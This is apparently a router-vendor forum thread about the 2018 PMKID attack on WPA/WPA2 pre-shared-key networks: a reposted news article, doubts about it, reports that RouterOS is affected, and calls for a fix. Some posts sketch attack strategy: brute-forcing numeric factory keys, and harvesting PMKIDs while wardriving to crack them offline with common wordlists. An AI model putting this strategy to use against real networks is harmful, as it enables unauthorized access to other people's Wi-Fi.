Researchers have accidentally discovered a new attack on the wi-fi protected access protocols used in wireless access points that makes it easier for outsiders to capture access credentials.
The new attack captures the Pairwise Master Key Identifier (PMKID) and - according to the Hashcat password recovery utility developers that devised it - works against 802.11i/p/q/r networks with roaming functions enabled, which covers most modern routers.

What is the difference between the new attack and previous WPA/WPA2 cracks?
According to Hashcat developer Jen “Atom” Steube, the most significant difference between older attacks and the newly discovered method is that an attacker no longer needs another user to be on the targeted network to capture credentials. The only thing needed is the initiation of the authentication process.

The researcher also added that earlier WPA/WPA2 attacks were more challenging to carry out, because “in the past the attacker had to record the WPA four-way handshake to launch an offline attack”. This may sound easy but in fact this type of attack can create a lot of trouble from a technical perspective.


The new attack is much easier to pull off, because “if you receive the PMKID from the access point, you will be able to get into the network if you can guess the [WPA] pre-shared key (PSK)“.

Depending on the length and complexity of the pre-shared key, the success of the attack may vary. It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.

In a nutshell, here’s why this attack is much better than previous techniques:

– No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
– No more waiting for a complete 4-way handshake between the regular user and the AP
– No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
– No more eventual invalid passwords sent by the regular user
– No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
– No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
– No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string

Who is affected?
At this time, the researchers are not sure for which vendors or for how many routers this technique will work, but they definitely think it will work against all 802.11i/p/q/r networks with roaming functions enabled. Shortly put, this means most modern routers.

My post is just a repost from here https://sensorstechforum.com/attack-wpa ... n-routers/
Also more info can be found here https://hashcat.net/forum/thread-7717.html and here https://www.itnews.com.au/news/new-wi-f ... eds-499659

Guess it's time for Mikrotik to try to find if they are vulnerable and what can they do.

Just another reason we need WPA3 sooner.

This is a vague article that tells us nothing. Sure they found a flaw but was it a fluke? Was it it isolated? Who knows really because it seems they've done nothing more but find it on they equipment they were using/testing and it was a mistake that they found it. They did not provide any information on the environments in which they found this issue with. What version of software that was being run, nothing.

So let us recap. If someone gets the PMKID then they *could possibly* guess the shared-key and get in. OK, so basically "If they guess your password, they win". Then they can't tell us what vendors or models this technique will work against. That means no real testing or anything on this. Follow that up with they *THINK* it might work against 802.11i/p/q/r networks. So again, no real testing.

How should any of us handle this? Doesn't matter which router you are using or who made it, what are we to do with this article? It provides not a single bit of information on how to stop it, to see if you're open to this method or anything of real value. Have they informed vendors such as Mikrotik, Cisco, etc? I don't see any of them making waves about this yet. All I've seen in some tech blogs and reddit posts. When people start posting and spreading every little article about "hacks" that have no real substance to them outside of "most modern routers" it can cause unneeded panic and cause people to start doing stupid things to "protect" themselves.

I've just tested it and it worked on my basic wireless network with EAP-PSK enabled. I'm running RouterOS v6.41rc44.

It would be great to get an official response from MikroTik whether RouterOS is affected by this bug (sending PMKID for PSK networks).
And what are the plans for fixing this in case RouterOS is affected?

Although most likely this attack doesn't improve cracking speed, it greatly increases attack surface (as it does not require any clients to be connected when obtaining the password hashes).

P.S. There is a duplicate post about this issue.

Davis,
Is ROS affected? IMHO it is stupid question.
If Mikrotik implements and follow WiFi standard then the standard is affected then this "flow in design" is in current ROS implemented.

What, in yor opinion, should be done? Change to WiFi implementation to not follow standard?

Please see this forum topic regarding discussed WPA2-PSK brute force attack method:

viewtopic.php?f=21&t=137838

Do I really understand this correctly, that when connecting to a router with one of these roaming protocols enabled, it sends out a hash which can be brute-forced to retrieve the PSK? Did no-one making the specs think this might be a problem? It's surprising it took this long to find considering the number of people who must of worked on implementing software for these protocols.

It should be noted that most users don’t have the technical capacity to change the PSK on their routers and generally use the manufacturer generated key. This becomes a premise for attackers to guess the key. The cracking of such a password becomes even easier with manufacturers creating PSKs following a pattern that can be traced back to the make of the routers.

We go through quite a few TP-Link routers as our basic home router. Before we reconfigure these, they come configured with network TP-Link_ABCD, and a fixed length key made up of numbers. Brute-forcing these would take minutes, and probably not much longer for any other manufacturer or broadband provider using fixed format keys.

Is ROS affected? IMHO it is stupid question.
If Mikrotik implements and follow WiFi standard then the standard is affected then this "flow in design" is in current ROS implemented.

Isn't PMKID sending beneficial only for EAP (so there is no need to send it for PSK networks)?

What, in yor opinion, should be done? Change to WiFi implementation to not follow standard?

Wasn't this exactly the thing done to mitigate KRACK vulnerabilities?

Hi,

I confirm this to be a problem, as experienced on two different RB951Ui-2HnD (versions 6.42.5 and 6.42.6), both running CAPsMAN. I tend to agree that a very strong psk solves the issue but the way I see it, it could make Wardriving an allegedly fun hobby again. The process is much faster than having to deauth legit clients and wait for handshakes. You could harvest a large amount of PMKIDs driving by, and brute force them offline later on. With a "rockyou.txt" type wordlist, the success rate could be interesting on a large scale harvest.